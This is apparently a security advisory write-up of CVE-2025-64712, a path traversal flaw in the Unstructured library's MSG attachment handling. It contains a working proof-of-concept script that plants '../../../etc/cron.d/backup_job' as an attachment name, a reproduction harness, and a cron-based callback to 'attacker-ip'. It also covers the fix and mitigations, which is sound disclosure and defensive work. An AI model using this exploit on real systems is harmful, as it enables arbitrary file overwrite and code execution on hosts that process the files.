
CVE-2025-64712: Path Traversal RCE in Unstructured Library MSG Processing

A technical breakdown of CVE-2025-64712, a CVSS 9.8 critical path traversal remote code execution vulnerability in the Unstructured Python library (< 0.18.18). Unsanitized attachment filenames in Outlook MSG processing allow for path traversal, enabling an attacker to overwrite arbitrary files via a crafted MSG file and achieve code execution.

Mon 23 February 2026

February 18, 2026 · CVSS 9.8 Critical · Unstructured < 0.18.18

CVE ID         | CVSS         | Affected  | Fixed
---------------|--------------|-----------|---------
CVE-2025-64712 | 9.8 Critical | < 0.18.18 | 0.18.18+

CVE-2025-64712 Overview: Path Traversal in Unstructured Library

The Unstructured Python library is an open-source toolkit for pre-processing complex document types. In a little over a year, it surpassed 4 million downloads, and it is used in nearly 10,000 public GitHub repositories, 100 Python packages, and behind the scenes in dozens of LLM-powered products. A critical Path Traversal (CWE-22) vulnerability was discovered in its partition_msg function, which processes Microsoft Outlook .msg files. When the process_attachments setting is enabled, which it is by default, a crafted file can make the library write files outside its intended temporary directory.

def partition_msg(
    filename: Optional[str] = None,
    *,
    file: Optional[IO[bytes]] = None,
    metadata_filename: Optional[str] = None,
    metadata_last_modified: Optional[str] = None,
    process_attachments: bool = True,  # the vulnerability trigger
    **kwargs: Any,
) -> list[Element]:

<SNIP>
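Because attachment handling is gated by process_attachments, a caller that cannot upgrade right away might turn the flag off explicitly. The wrapper below is a minimal sketch of that idea: the name partition_msg_skipping_attachments is hypothetical, and the assumption that disabling the flag avoids the attachment write path should be verified against the installed version.

```python
from typing import Any


def partition_msg_skipping_attachments(path: str, **kwargs: Any) -> list:
    """Hypothetical wrapper: partition a .msg file without processing attachments."""
    # Imported lazily so this module still loads where unstructured is not installed.
    from unstructured.partition.msg import partition_msg

    # Override any caller-supplied value so attachments are never processed.
    kwargs["process_attachments"] = False
    return partition_msg(filename=path, **kwargs)
```

This trades functionality for safety, since attachment content is no longer extracted. It is a stopgap, not a substitute for the upgrade.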

Path Traversal in Unstructured Library: Unsafe Filename Handling

The core of the issue is a Path Traversal (CWE-22) vulnerability. The library's _attachment_file_name property returns the attachment name exactly as it is stored in the .msg file, with no sanitization, and that name is later used to build the path the attachment is written to.

@lazyproperty
def _attachment_file_name(self) -> str:
    """The original name of the attached file, no path.
    This value is 'unknown' if it is not present in the MSG file (not expected).
    """
    return self._attachment.file_name or "unknown"
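To see why an unsanitized name is dangerous, consider what happens when it is joined to a directory path. The snippet below is an illustrative sketch, not the library's code: it assumes the attachment destination is built by joining a temporary directory with the attachment name, and the directory /tmp/tmpabc123 and the helper joined_destination are hypothetical. It uses posixpath so the result is the same on any platform, and it only computes paths without writing anything.

```python
import posixpath


def joined_destination(tmp_dir: str, attachment_name: str) -> str:
    """Return the normalized path produced by a naive directory + name join."""
    return posixpath.normpath(posixpath.join(tmp_dir, attachment_name))


tmp_dir = "/tmp/tmpabc123"  # hypothetical temporary directory

benign = joined_destination(tmp_dir, "backup_job")
crafted = joined_destination(tmp_dir, "../../../etc/cron.d/backup_job")

print(benign)   # /tmp/tmpabc123/backup_job
print(crafted)  # /etc/cron.d/backup_job
```

The three ".." components climb out of the two-level temporary directory, and any extra ".." at the root is simply ignored, so the attacker does not need to know the exact directory depth.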

CVE-2025-64712 Proof-of-Concept: Remote Code Execution via Path Traversal

Exploitation of CVE-2025-64712 involves a deliberate four-step process to transform a standard email attachment into a system-level command. The following steps outline how an attacker moves from a simple .msg file to full Remote Code Execution (RCE).

Step 1: Crafting the Initial .msg File

The attack begins by generating a legitimate Microsoft Outlook Message (.msg) file to serve as the delivery vector.

  • Initialize the Draft: Open Outlook and create a new email message.

  • Embed the Payload: Populate the message fields and attach the file containing your target content (e.g., a cron job script intended for the target’s configuration directory).

  • Export the File: Navigate to File > Save As (or Download > Download as MSG in web clients) to export the message.

At this stage, the file is harmless because the attachment name is standard (e.g., backup_job).

Viewing attachments in the .msg file

Step 2: Injecting the Traversal Path

The attacker uses a specialized Python script to modify the binary structure of the .msg file. By targeting the OLE structures within the file, the attacker renames the attachment from a simple filename to a relative path containing traversal sequences.

  • The Transformation: backup_job becomes ../../../etc/cron.d/backup_job.

  • The Result: A crafted payload.msg is generated where the filename itself contains the instructions to escape the temporary directory.

#!/usr/bin/env python3
"""
rename_msg_attachment.py
------------------------
Rename an attachment's filename inside a .msg (OLE2/Compound Document) file.
Supports new filenames of ANY length — reallocates mini-sectors as needed.

Edit the three variables below and run:
    python rename_msg_attachment.py
"""

import sys
import struct
import shutil
import os
import math



INPUT_FILE  = "backup.msg"        # Path to the source .msg file
OLD_NAME    = "backup_job"        # Current attachment filename 
NEW_NAME    = "../../../etc/cron.d/backup_job"       # New attachment filename 
OUTPUT_FILE = "payload.msg"                # Output path — leave empty "" to overwrite INPUT_FILE

<SNIP>


# Core rename logic

def rename_attachment(input_path, old_name, new_name, output_path):
    print(f"[*] Opening: {input_path}")
    ole = OleFile(input_path)

    attach_storages = find_attach_storages(ole)
    if not attach_storages:
        err("No attachment storages found in this .msg file.")

    print(f"[*] Found {len(attach_storages)} attachment(s).")

    renamed = 0
    for att in attach_storages:
        children = get_children(ole, att['idx'])
        by_name  = {c['name'].upper(): c for c in children}

        long_e  = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
        short_e = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
        disp_e  = by_name.get(prop_stream_name(PR_DISPLAY_NAME).upper())
        ext_e   = by_name.get(prop_stream_name(PR_ATTACH_EXTENSION).upper())

        current = None
        if long_e:
            current = read_unicode(ole, long_e['idx'])
        elif short_e:
            current = read_unicode(ole, short_e['idx'])

        print(f"    [{att['name']}]  current filename: {current!r}")

        if current is None or current.lower() != old_name.lower():
            continue

        # Encode new values
        new_encoded   = encode_unicode(new_name)
        short_encoded = encode_unicode(short_name(new_name))
        parts         = new_name.rsplit('.', 1)
        new_ext       = ('.' + parts[1]) if len(parts) == 2 else ''
        ext_encoded   = encode_unicode(new_ext)

        print(f"    [+] Match! Renaming '{current}' -> '{new_name}'")
        print(f"        old size: {len(encode_unicode(current))} bytes  "
              f"new size: {len(new_encoded)} bytes")

        if long_e:
            ole.write_stream(long_e['idx'], new_encoded)
            print(f"        ✓ Long filename patched.")

        if short_e:
            ole.write_stream(short_e['idx'], short_encoded)
            print(f"        ✓ Short filename patched -> '{short_name(new_name)}'")

        if disp_e:
            ole.write_stream(disp_e['idx'], new_encoded)
            print(f"        ✓ Display name patched.")

        if ext_e:
            ole.write_stream(ext_e['idx'], ext_encoded)
            print(f"        ✓ Extension patched -> '{new_ext}'")

        renamed += 1

    if renamed == 0:
        print(f"\n[!] No attachment named '{old_name}' was found.")
        all_names = []
        for att in attach_storages:
            children = get_children(ole, att['idx'])
            by_name  = {c['name'].upper(): c for c in children}
            long_e   = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
            short_e  = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
            name = None
            if long_e:
                name = read_unicode(ole, long_e['idx'])
            elif short_e:
                name = read_unicode(ole, short_e['idx'])
            if name:
                all_names.append(name)
        if all_names:
            print(f"    Available attachment(s): {', '.join(repr(n) for n in all_names)}")
            def similarity(a, b):
                a, b = a.lower(), b.lower()
                return sum(c in b for c in a) / max(len(a), 1)
            best = max(all_names, key=lambda n: similarity(old_name, n))
            if similarity(old_name, best) > 0.5:
                print(f"    Did you mean: '{best}' ?")
        sys.exit(1)

    ole.save(output_path)
    print(f"\n[✓] Saved to: {output_path}  ({renamed} attachment(s) renamed)")

<SNIP>

Successfully renaming the attachment filename
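The script's helper functions are snipped, but the streams it patches follow the naming convention of the MSG format, where each string property is stored in a stream named after its property ID and type. The sketch below illustrates that convention with hypothetical stand-ins (substg_stream_name, encode_msg_string, decode_msg_string). They are not the script's own helpers, and whether the script's PR_* constants hold property IDs or full property tags is not shown in the excerpt.

```python
# MAPI property IDs for the fields the rename script patches.
PR_DISPLAY_NAME = 0x3001
PR_ATTACH_EXTENSION = 0x3703
PR_ATTACH_FILENAME = 0x3704
PR_ATTACH_LONG_FILENAME = 0x3707

PT_UNICODE = 0x001F  # property type for UTF-16LE strings


def substg_stream_name(prop_id: int, prop_type: int = PT_UNICODE) -> str:
    """Build the OLE stream name that stores a variable-length property."""
    return f"__substg1.0_{prop_id:04X}{prop_type:04X}"


def encode_msg_string(value: str) -> bytes:
    """Encode a string the way Unicode string properties are stored."""
    return value.encode("utf-16-le")


def decode_msg_string(raw: bytes) -> str:
    """Decode a Unicode string property, tolerating trailing NUL padding."""
    return raw.decode("utf-16-le").rstrip("\x00")


old_bytes = encode_msg_string("backup_job")
new_bytes = encode_msg_string("../../../etc/cron.d/backup_job")

print(substg_stream_name(PR_ATTACH_LONG_FILENAME))  # __substg1.0_3707001F
print(len(old_bytes), len(new_bytes))               # 20 60
```

The size jump from 20 to 60 bytes is why the script advertises support for names of any length: the longer name no longer fits in the space the original occupied, so the stream has to be reallocated.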

Step 3: Setting Up the Test Environment

To reproduce the flaw, a controlled environment (typically a Docker container) is used to run the vulnerable version of the unstructured library (v0.18.15). A simple Python wrapper is written to call the partition_msg function with the critical process_attachments=True flag enabled.

import os
import sys
from unstructured.partition.msg import partition_msg

# Lift the integer string conversion digit limit (Python 3.11+),
# which otherwise causes parser crashes
if hasattr(sys, 'set_int_max_str_digits'):
    sys.set_int_max_str_digits(0)


def process_msg():
    print("[*] Handing payload.msg to partition_msg()...")


    try:
        # This triggers the vulnerable function:
        partition_msg(
            filename="payload.msg",
            process_attachments=True
        )
    except Exception as e:
        # We catch the exception because the parser often crashes 
        # AFTER the file is written due to OLE sector math errors.
        print(f"[!] Parser finished with: {e}")

    # THE FINAL VERDICT
    if os.path.exists("/etc/cron.d/backup_job"):
        print("\n" + "="*45)
        print("!!! VULNERABILITY REPRODUCED !!!")
        print("The library successfully wrote to '/etc/cron.d/backup_job'")
        with open("/etc/cron.d/backup_job", "r") as f:
            print(f"File content: {f.read()}")
        print("="*45)
    else:
        print("\n[-] Exploit failed: /etc/cron.d/backup_job not found.")

if __name__ == "__main__":
    process_msg()

Step 4: Exploitation and RCE

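When the reproduction script processes the malicious payload.msg, the library extracts the attachment. Because the filename is not sanitized, the library joins the traversal string to its temporary directory path, and the write lands in a system directory on the host. This only succeeds when the process has write permission to the target directory, which is why the impact is greatest for services running as root.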

  • File Write: The library writes the attacker's script to /etc/cron.d/backup_job.
  • Command Execution: The system's cron daemon picks up the new job, which might contain a command like curl http://attacker-ip:port/rce_test.
  • The Verdict: The attacker observes an incoming request on their server, confirming that they can now execute arbitrary code on the target system.

Remote Code Execution via cron jobs

How to Fix CVE-2025-64712 in Unstructured Library

The most effective way to secure your environment is to update to Unstructured version 0.18.18 or higher. The fix introduces a robust sanitization process that strips away dangerous path components.
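To confirm whether an environment is affected, the installed version can be compared against 0.18.18. The following is a minimal sketch using only the standard library. The helper names are hypothetical, and the simplified parser looks only at the first three numeric components, so a pre-release such as 0.18.18.dev1 would be treated as 0.18.18.

```python
import re
from importlib.metadata import PackageNotFoundError, version
from typing import Optional, Tuple

FIXED_VERSION = (0, 18, 18)  # first release containing the fix


def parse_release(version_string: str) -> Tuple[int, ...]:
    """Extract up to three leading numeric components, padding with zeros."""
    parts = []
    for piece in version_string.split(".")[:3]:
        match = re.match(r"\d+", piece)
        if not match:
            break
        parts.append(int(match.group()))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected(version_string: str) -> bool:
    """Return True if the given version predates the fixed release."""
    return parse_release(version_string) < FIXED_VERSION


def installed_unstructured_is_affected() -> Optional[bool]:
    """Check the installed package; None means unstructured is not installed."""
    try:
        return is_affected(version("unstructured"))
    except PackageNotFoundError:
        return None


print(is_affected("0.18.15"))  # True
print(is_affected("0.18.18"))  # False
```

A check like this could run at service startup or in CI to fail fast on a vulnerable pin.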

Remediated Code Analysis

The patched version now includes logic to clean the filename for both Unix and Windows path separators:

# The updated, safe logic in v0.18.18+
raw_filename = self._attachment.file_name or "unknown"

# Remove path components; Windows separators are normalized first
# so that basename handles both styles
safe_filename = os.path.basename(raw_filename.replace("\\", "/"))

# Strip null bytes
safe_filename = safe_filename.replace("\0", "")

# Fall back to a default if the filename is empty or just dots
if not safe_filename or safe_filename in (".", ".."):
    safe_filename = "unknown"
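The effect of these steps is easiest to see on concrete inputs. The function below is a standalone sketch that mirrors the excerpt above. The name sanitize_attachment_name is hypothetical and not part of the library, and the sample inputs are illustrative.

```python
import os
from typing import Optional


def sanitize_attachment_name(raw_filename: Optional[str]) -> str:
    """Reduce an untrusted attachment name to a bare, safe file name."""
    raw = raw_filename or "unknown"
    # Normalize Windows separators, then drop every directory component.
    safe = os.path.basename(raw.replace("\\", "/"))
    # Strip null bytes.
    safe = safe.replace("\0", "")
    # Reject names that are empty or refer to a directory.
    if not safe or safe in (".", ".."):
        safe = "unknown"
    return safe


print(sanitize_attachment_name("../../../etc/cron.d/backup_job"))  # backup_job
print(sanitize_attachment_name("..\\..\\evil.txt"))                # evil.txt
print(sanitize_attachment_name(".."))                              # unknown
```

With the traversal components gone, joining the result to the temporary directory can only produce a path directly inside it.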

CVE-2025-64712 Mitigation and Best Practices

  • Update Now: If you use unstructured for email processing, ensure you are on version 0.18.18 or later.
  • Sanitize Inputs: Reduce any filename taken from an untrusted file to its base name before using it in a path, for example with os.path.basename() after normalizing backslashes to forward slashes.
  • Permission Check: Run your processing scripts with the minimum necessary permissions to limit the impact of a potential file-write vulnerability.
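As a defense-in-depth measure alongside filename sanitization, code that writes untrusted files can also verify that the final resolved path stays inside the intended directory. The helper below is a minimal sketch of that check. The name resolve_inside is hypothetical, and it is offered as a general pattern rather than anything taken from the Unstructured fix.

```python
import os


def resolve_inside(base_dir: str, untrusted_name: str) -> str:
    """Join a name to base_dir, refusing any result outside base_dir."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." components and resolves symlinks.
    candidate = os.path.realpath(os.path.join(base, untrusted_name))
    # The candidate must be strictly below the base directory.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"refusing to write outside {base!r}: {untrusted_name!r}")
    return candidate
```

A caller would open the returned path for writing only if no ValueError was raised. With the crafted name ../../../etc/cron.d/backup_job, the resolved candidate lies outside the base directory, so the check fails before any file is created.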

Resource                    | Link
----------------------------|-----
Unstructured CVE-2025-64712 | https://github.com/Unstructured-IO/unstructured/security/advisories/GHSA-gm8q-m8mv-jj5m
Unstructured Fix            | https://github.com/Unstructured-IO/unstructured/compare/0.18.15...0.18.18
NVD                         | https://nvd.nist.gov/vuln/detail/CVE-2025-64712
CWE-22                      | https://cwe.mitre.org/data/definitions/22.html